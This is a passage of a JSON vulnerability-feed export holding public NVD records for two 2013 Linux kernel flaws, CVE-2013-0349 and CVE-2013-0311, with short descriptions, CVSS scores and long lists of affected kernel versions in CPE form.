"cpe:2.3:o:linux:linux_kernel:3.0.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.30:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.38:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.28:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc7:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:52:36", "description": "The hidp_setup_hid function in net/bluetooth/hidp/core.c in the Linux kernel before 3.7.6 does not properly copy a certain name field, which allows local users to obtain sensitive information from kernel memory by setting a long name and making an HIDPCONNADD ioctl call.", "edition": 5, "cvss3": {}, "published": "2013-02-28T19:55:00", "title": "CVE-2013-0349", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-0349"], "modified": "2013-06-05T03:40:00", "cpe": ["cpe:/o:linux:linux_kernel:3.7", "cpe:/o:linux:linux_kernel:3.0.36", "cpe:/o:linux:linux_kernel:3.4.4", "cpe:/o:linux:linux_kernel:3.1.4", "cpe:/o:linux:linux_kernel:3.1.7", "cpe:/o:linux:linux_kernel:3.0.30", "cpe:/o:linux:linux_kernel:3.4.10", "cpe:/o:linux:linux_kernel:3.2.14", "cpe:/o:linux:linux_kernel:3.0.27", "cpe:/o:linux:linux_kernel:3.2.7", "cpe:/o:linux:linux_kernel:3.4.19", "cpe:/o:linux:linux_kernel:3.4.21", "cpe:/o:linux:linux_kernel:3.2.24", "cpe:/o:linux:linux_kernel:3.2.25", "cpe:/o:linux:linux_kernel:3.5.5", "cpe:/o:linux:linux_kernel:3.0.33", "cpe:/o:linux:linux_kernel:3.3.6", "cpe:/o:linux:linux_kernel:3.2.8", "cpe:/o:linux:linux_kernel:3.0.9", "cpe:/o:linux:linux_kernel:3.4.23", "cpe:/o:linux:linux_kernel:3.4.2", "cpe:/o:linux:linux_kernel:3.4.13", "cpe:/o:linux:linux_kernel:3.2.29", "cpe:/o:linux:linux_kernel:3.2.18", "cpe:/o:linux:linux_kernel:3.0.6", "cpe:/o:linux:linux_kernel:3.6.10", "cpe:/o:linux:linux_kernel:3.6.5", "cpe:/o:linux:linux_kernel:3.0.17", "cpe:/o:linux:linux_kernel:3.6", "cpe:/o:linux:linux_kernel:3.2.23", "cpe:/o:linux:linux_kernel:3.0.10", "cpe:/o:linux:linux_kernel:3.6.3", "cpe:/o:linux:linux_kernel:3.7.3", "cpe:/o:linux:linux_kernel:3.0.40", "cpe:/o:linux:linux_kernel:3.1.3", "cpe:/o:linux:linux_kernel:3.0.7", "cpe:/o:linux:linux_kernel:3.3", "cpe:/o:linux:linux_kernel:3.0.20", "cpe:/o:linux:linux_kernel:3.2.30", "cpe:/o:linux:linux_kernel:3.0.31", "cpe:/o:linux:linux_kernel:3.4.9", "cpe:/o:linux:linux_kernel:3.2.13", "cpe:/o:linux:linux_kernel:3.4.24", "cpe:/o:linux:linux_kernel:3.0.12", "cpe:/o:linux:linux_kernel:3.0.41", "cpe:/o:linux:linux_kernel:3.0.15", "cpe:/o:linux:linux_kernel:3.2.27", "cpe:/o:linux:linux_kernel:3.0.23", "cpe:/o:linux:linux_kernel:3.0.44", "cpe:/o:linux:linux_kernel:3.1.10", "cpe:/o:linux:linux_kernel:3.4.6", "cpe:/o:linux:linux_kernel:3.0.13", "cpe:/o:linux:linux_kernel:3.6.1", "cpe:/o:linux:linux_kernel:3.0.5", "cpe:/o:linux:linux_kernel:3.0.39", "cpe:/o:linux:linux_kernel:3.5.1", "cpe:/o:linux:linux_kernel:3.0.3", "cpe:/o:linux:linux_kernel:3.2.28", "cpe:/o:linux:linux_kernel:3.3.4", "cpe:/o:linux:linux_kernel:3.3.7", "cpe:/o:linux:linux_kernel:3.0.14", "cpe:/o:linux:linux_kernel:3.0.28", "cpe:/o:linux:linux_kernel:3.0.25", "cpe:/o:linux:linux_kernel:3.0.1", "cpe:/o:linux:linux_kernel:3.2.3", "cpe:/o:linux:linux_kernel:3.7.2", "cpe:/o:linux:linux_kernel:3.0.8", "cpe:/o:linux:linux_kernel:3.2.17", "cpe:/o:linux:linux_kernel:3.2.6", "cpe:/o:linux:linux_kernel:3.7.5", "cpe:/o:linux:linux_kernel:3.2.1", "cpe:/o:linux:linux_kernel:3.4.3", "cpe:/o:linux:linux_kernel:3.3.2", "cpe:/o:linux:linux_kernel:3.4.20", "cpe:/o:linux:linux_kernel:3.3.3", "cpe:/o:linux:linux_kernel:3.2.19", "cpe:/o:linux:linux_kernel:3.2.16", "cpe:/o:linux:linux_kernel:3.1.1", "cpe:/o:linux:linux_kernel:3.2.5", "cpe:/o:linux:linux_kernel:3.6.6", "cpe:/o:linux:linux_kernel:3.2.2", "cpe:/o:linux:linux_kernel:3.5.6", "cpe:/o:linux:linux_kernel:3.4.22", "cpe:/o:linux:linux_kernel:3.0.18", "cpe:/o:linux:linux_kernel:3.0.19", "cpe:/o:linux:linux_kernel:3.1.5", "cpe:/o:linux:linux_kernel:3.0.26", "cpe:/o:linux:linux_kernel:3.4", "cpe:/o:linux:linux_kernel:3.4.17", "cpe:/o:linux:linux_kernel:3.6.9", "cpe:/o:linux:linux_kernel:3.0.37", "cpe:/o:linux:linux_kernel:3.0.34", "cpe:/o:linux:linux_kernel:3.0", "cpe:/o:linux:linux_kernel:3.0.32", "cpe:/o:linux:linux_kernel:3.3.8", "cpe:/o:linux:linux_kernel:3.0.16", "cpe:/o:linux:linux_kernel:3.0.38", "cpe:/o:linux:linux_kernel:3.2.4", "cpe:/o:linux:linux_kernel:3.4.15", "cpe:/o:linux:linux_kernel:3.2.15", "cpe:/o:linux:linux_kernel:3.1.9", "cpe:/o:linux:linux_kernel:3.4.18", "cpe:/o:linux:linux_kernel:3.2.20", "cpe:/o:linux:linux_kernel:3.2.12", "cpe:/o:linux:linux_kernel:3.2.21", "cpe:/o:linux:linux_kernel:3.0.2", "cpe:/o:linux:linux_kernel:3.4.8", "cpe:/o:linux:linux_kernel:3.2.11", "cpe:/o:linux:linux_kernel:3.5.7", "cpe:/o:linux:linux_kernel:3.2.22", "cpe:/o:linux:linux_kernel:3.0.4", "cpe:/o:linux:linux_kernel:3.0.42", "cpe:/o:linux:linux_kernel:3.0.21", "cpe:/o:linux:linux_kernel:3.2.9", "cpe:/o:linux:linux_kernel:3.6.7", "cpe:/o:linux:linux_kernel:3.0.29", "cpe:/o:linux:linux_kernel:3.2", "cpe:/o:linux:linux_kernel:3.4.7", "cpe:/o:linux:linux_kernel:3.5.4", "cpe:/o:linux:linux_kernel:3.3.5", "cpe:/o:linux:linux_kernel:3.5.3", "cpe:/o:linux:linux_kernel:3.4.14", "cpe:/o:linux:linux_kernel:3.0.43", "cpe:/o:linux:linux_kernel:3.0.11", "cpe:/o:linux:linux_kernel:3.7.4", "cpe:/o:linux:linux_kernel:3.5.2", "cpe:/o:linux:linux_kernel:3.0.35", "cpe:/o:linux:linux_kernel:3.4.16", "cpe:/o:linux:linux_kernel:3.1", "cpe:/o:linux:linux_kernel:3.6.11", "cpe:/o:linux:linux_kernel:3.4.12", "cpe:/o:linux:linux_kernel:3.1.6", "cpe:/o:linux:linux_kernel:3.0.22", "cpe:/o:linux:linux_kernel:3.0.24", "cpe:/o:linux:linux_kernel:3.7.1", "cpe:/o:linux:linux_kernel:3.6.4", "cpe:/o:linux:linux_kernel:3.1.8", "cpe:/o:linux:linux_kernel:3.1.2", "cpe:/o:linux:linux_kernel:3.3.1", "cpe:/o:linux:linux_kernel:3.6.2", "cpe:/o:linux:linux_kernel:3.2.26", "cpe:/o:linux:linux_kernel:3.6.8", "cpe:/o:linux:linux_kernel:3.4.5", "cpe:/o:linux:linux_kernel:3.4.1", "cpe:/o:linux:linux_kernel:3.2.10", "cpe:/o:linux:linux_kernel:3.4.11"], "id": "CVE-2013-0349", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0349", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:3.0:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.24:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.28:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.37:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.39:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.26:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.25:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.43:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.44:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.42:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.32:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.27:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.31:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.36:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.40:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.21:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.24:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.41:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.30:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.34:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.35:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.21:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.24:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.25:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.29:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.21:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.33:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.29:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.26:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.30:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.38:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.28:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc7:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:52:36", "description": "The translate_desc function in drivers/vhost/vhost.c in the Linux kernel before 3.7 does not properly handle cross-region descriptors, which allows guest OS users to obtain host OS privileges by leveraging KVM guest OS privileges.\nPer https://access.redhat.com/security/cve/CVE-2013-0311\r\n\"This issue did affect the version of Linux kernel as shipped with Red Hat Enterprise Linux 6.\"", "edition": 5, "cvss3": {}, "published": "2013-02-22T00:55:00", "title": "CVE-2013-0311", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 2.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.5, "vectorString": "AV:A/AC:H/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-0311"], "modified": "2019-04-22T17:48:00", "cpe": ["cpe:/o:linux:linux_kernel:3.0.36", "cpe:/o:linux:linux_kernel:3.4.4", "cpe:/o:linux:linux_kernel:3.1.4", "cpe:/o:linux:linux_kernel:3.1.7", "cpe:/o:linux:linux_kernel:3.0.30", "cpe:/o:linux:linux_kernel:3.4.10", "cpe:/o:linux:linux_kernel:3.2.14", "cpe:/o:linux:linux_kernel:3.0.27", "cpe:/o:linux:linux_kernel:3.2.7", "cpe:/o:linux:linux_kernel:3.4.19", "cpe:/o:linux:linux_kernel:3.4.21", "cpe:/o:linux:linux_kernel:3.2.24", "cpe:/o:linux:linux_kernel:3.2.25", "cpe:/o:linux:linux_kernel:3.5.5", "cpe:/o:linux:linux_kernel:3.0.33", "cpe:/o:linux:linux_kernel:3.3.6", "cpe:/o:linux:linux_kernel:3.2.8", "cpe:/o:linux:linux_kernel:3.0.9", "cpe:/o:linux:linux_kernel:3.4.23", "cpe:/o:linux:linux_kernel:3.4.2", "cpe:/o:linux:linux_kernel:3.4.13", "cpe:/o:linux:linux_kernel:3.2.29", "cpe:/o:linux:linux_kernel:3.2.18", "cpe:/o:linux:linux_kernel:3.0.6", "cpe:/o:linux:linux_kernel:3.6.10", "cpe:/o:linux:linux_kernel:3.0.17", "cpe:/o:linux:linux_kernel:3.2.23", "cpe:/o:linux:linux_kernel:3.0.10", "cpe:/o:linux:linux_kernel:3.0.40", "cpe:/o:linux:linux_kernel:3.1.3", "cpe:/o:linux:linux_kernel:3.0.7", "cpe:/o:linux:linux_kernel:3.3", "cpe:/o:linux:linux_kernel:3.0.20", "cpe:/o:linux:linux_kernel:3.2.30", "cpe:/o:linux:linux_kernel:3.0.31", "cpe:/o:linux:linux_kernel:3.4.9", "cpe:/o:linux:linux_kernel:3.2.13", "cpe:/o:linux:linux_kernel:3.4.24", "cpe:/o:linux:linux_kernel:3.0.12", "cpe:/o:linux:linux_kernel:3.0.41", "cpe:/o:linux:linux_kernel:3.0.15", "cpe:/o:linux:linux_kernel:3.2.27", "cpe:/o:linux:linux_kernel:3.0.23", "cpe:/o:linux:linux_kernel:3.0.44", "cpe:/o:linux:linux_kernel:3.1.10", "cpe:/o:linux:linux_kernel:3.4.6", "cpe:/o:linux:linux_kernel:3.0.13", "cpe:/o:linux:linux_kernel:3.0.5", "cpe:/o:linux:linux_kernel:3.0.39", "cpe:/o:linux:linux_kernel:3.5.1", "cpe:/o:linux:linux_kernel:3.0.3", "cpe:/o:linux:linux_kernel:3.2.28", "cpe:/o:linux:linux_kernel:3.3.4", "cpe:/o:linux:linux_kernel:3.3.7", "cpe:/o:linux:linux_kernel:3.0.14", "cpe:/o:linux:linux_kernel:3.0.28", "cpe:/o:linux:linux_kernel:3.0.25", "cpe:/o:linux:linux_kernel:3.0.1", "cpe:/o:linux:linux_kernel:3.2.3", "cpe:/o:linux:linux_kernel:3.0.8", "cpe:/o:linux:linux_kernel:3.2.17", "cpe:/o:linux:linux_kernel:3.2.6", "cpe:/o:linux:linux_kernel:3.2.1", "cpe:/o:linux:linux_kernel:3.4.3", "cpe:/o:linux:linux_kernel:3.3.2", "cpe:/o:linux:linux_kernel:3.4.20", "cpe:/o:linux:linux_kernel:3.3.3", "cpe:/o:linux:linux_kernel:3.2.19", "cpe:/o:linux:linux_kernel:3.2.16", "cpe:/o:linux:linux_kernel:3.1.1", "cpe:/o:linux:linux_kernel:3.2.5", "cpe:/o:linux:linux_kernel:3.2.2", "cpe:/o:linux:linux_kernel:3.5.6", "cpe:/o:linux:linux_kernel:3.4.22", "cpe:/o:linux:linux_kernel:3.0.18", "cpe:/o:linux:linux_kernel:3.0.19", "cpe:/o:linux:linux_kernel:3.1.5", "cpe:/o:linux:linux_kernel:3.0.26", "cpe:/o:linux:linux_kernel:3.4", "cpe:/o:linux:linux_kernel:3.4.17", "cpe:/o:linux:linux_kernel:3.6.9", "cpe:/o:linux:linux_kernel:3.0.37", "cpe:/o:linux:linux_kernel:3.0.34", "cpe:/o:linux:linux_kernel:3.0", "cpe:/o:linux:linux_kernel:3.0.32", "cpe:/o:linux:linux_kernel:3.3.8", "cpe:/o:linux:linux_kernel:3.0.16", "cpe:/o:linux:linux_kernel:3.0.38", "cpe:/o:linux:linux_kernel:3.2.4", "cpe:/o:linux:linux_kernel:3.4.15", "cpe:/o:linux:linux_kernel:3.2.15", "cpe:/o:linux:linux_kernel:3.1.9", "cpe:/o:linux:linux_kernel:3.4.18", "cpe:/o:linux:linux_kernel:3.2.20", "cpe:/o:linux:linux_kernel:3.2.12", "cpe:/o:linux:linux_kernel:3.2.21", "cpe:/o:linux:linux_kernel:3.0.2", "cpe:/o:linux:linux_kernel:3.4.8", "cpe:/o:linux:linux_kernel:3.2.11", "cpe:/o:linux:linux_kernel:3.5.7", "cpe:/o:linux:linux_kernel:3.2.22", "cpe:/o:linux:linux_kernel:3.0.4", "cpe:/o:linux:linux_kernel:3.0.42", "cpe:/o:linux:linux_kernel:3.0.21", "cpe:/o:linux:linux_kernel:3.2.9", "cpe:/o:linux:linux_kernel:3.0.29", 